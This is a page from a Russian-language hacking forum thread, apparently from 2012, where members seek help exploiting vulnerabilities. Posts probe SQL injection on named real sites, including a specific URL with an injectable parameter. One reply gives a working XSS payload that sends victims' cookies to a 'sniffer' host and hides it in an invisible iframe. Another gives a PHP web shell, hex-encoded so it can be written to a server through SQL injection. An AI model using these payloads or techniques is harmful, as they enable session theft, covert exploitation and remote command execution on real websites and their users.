Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    прав не хватает
     
  2. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А обойти это как нибудь можно?
     
  3. rudolph

    rudolph Member

    Joined:
    15 Feb 2012
    Messages:
    17
    Likes Received:
    6
    Reputations:
    0
    Есть скрипт asp, выводящий новости, в котором подозреваю SQLi
    Ситуация следующая:
    когда передаю в id новости кавычку/двойную кавычку или 1'+--+ или 1'+;+ и т.д. он не выводит ничего... Но есть 1 вариант, вывод которого отличается от всех: 1'-- (то есть без пробела после кавычки) в этом случае выплевывает "The server (www.x.com) encountered an error attempting to respond to your request."
    Почему при этом варианте вывод отличается и какой может быть вид sql-запроса?

    Подумал что фильтруют пробелы изменил запрос на 1'/**/--/**/ получил вывод с ошибкой как при 1'-- и при 1'/**/or/**/1=1/* аналогично. Еще пробовал подбирать закрывающие скобки, ничего не менялось. Все эти случаи как с 1'--
     
    #20063 rudolph, 5 Apr 2012
    Last edited: 5 Apr 2012
  4. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Добрый день, сть хсс вида:
    Как сначала отправить на ядовитую ссылку (либо просто слить куки), а потом вернуть юзера на нужную страницу?

    Проблемма в том, что для кражи куков используется картинка, на которую и идет редирект. А с неё уже не выходит перенаправить(

    Спасибо.
     
  5. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Сливаеш куки потом,
    Code:
    window.location = 'http://jghjhgk'; 
     
    1 person likes this.
  6. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    А как слить куки на сниффер без переадресации?
     
  7. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Подскажите, пожалуйста, что это за разновидность эдитора такая?

    [​IMG]

    а то немного запутался. спасибо.
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Через ифреем!
     
    _________________________
  9. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    или через AJAX))
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем!


    p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему.

    p.p.s. теперь мне понятно:
     
    _________________________
    #20070 Expl0ited, 7 Apr 2012
    Last edited: 7 Apr 2012
    1 person likes this.
  11. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    Приветствую, при запросе ( search_result.php?search=1 ') выдаёт

    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393

    стоит ли ковырять дальше ?
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    нет.
     
    _________________________
  13. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Вопрос такого плана.
    Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой.
    http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_who2='&input_bdsm_position=&input_age1=&input_age2=&input_country_id=0&input_state_id=0&input_city_id=0

    параметр input_who2
    вот ошибка
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    У меня маленький вопросец,

    залил шел через скулю
    открываю его, а мне пишет

    хотел создать свой .htaccess с содержимым


    но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
     
  15. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    хз. если ток искать другую директорию для заливки шелла.
     
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    site.com/index.php?id="><img+src=1+onerror="(new+Image()).src='//sniffer.com/test.jpg?'%2Bescape(document.cookie)

    Судя по "> в начале XSS, закрывать обработчик onerror и тег img не нужно.


    Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте:
    <iframe style="width:0px;height:0px;visibility:hidden" src="//site.com/index.php?id=&quot;><img src=1 onerror=&quot;(new Image()).src='//sniffer.com/test.jpg?'+escape(document.cookie)"></iframe>

    Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности (&quot;, &#34; или &#x22;). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами.


    Домен сниффера отличается от домена XSS ;)
     
    #20076 M_script, 8 Apr 2012
    Last edited: 8 Apr 2012
    2 people like this.
  17. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Пытаюсь залить шелл через mysql(f_p =Y).
    Мой запрос выглядит так:
    Вылетает такая ошибка.
    (Шелл на сайт уже заливал кто-то, сапа стоит)
     
    #20077 kise, 8 Apr 2012
    Last edited: 8 Apr 2012
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    попробуй этот код за хексить <? system($_REQUEST['cmd']); ?>
    получится 0x3c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e
     
  19. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше...

    Разобрался.
    Так выводит 13 ошибку, а это - ошибка записи.
     
    #20079 kise, 8 Apr 2012
    Last edited: 8 Apr 2012
  20. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Зачем union select дважды то?

     
    #20080 gl0w, 8 Apr 2012
    Last edited: 9 Apr 2012
Thread Status:
Not open for further replies.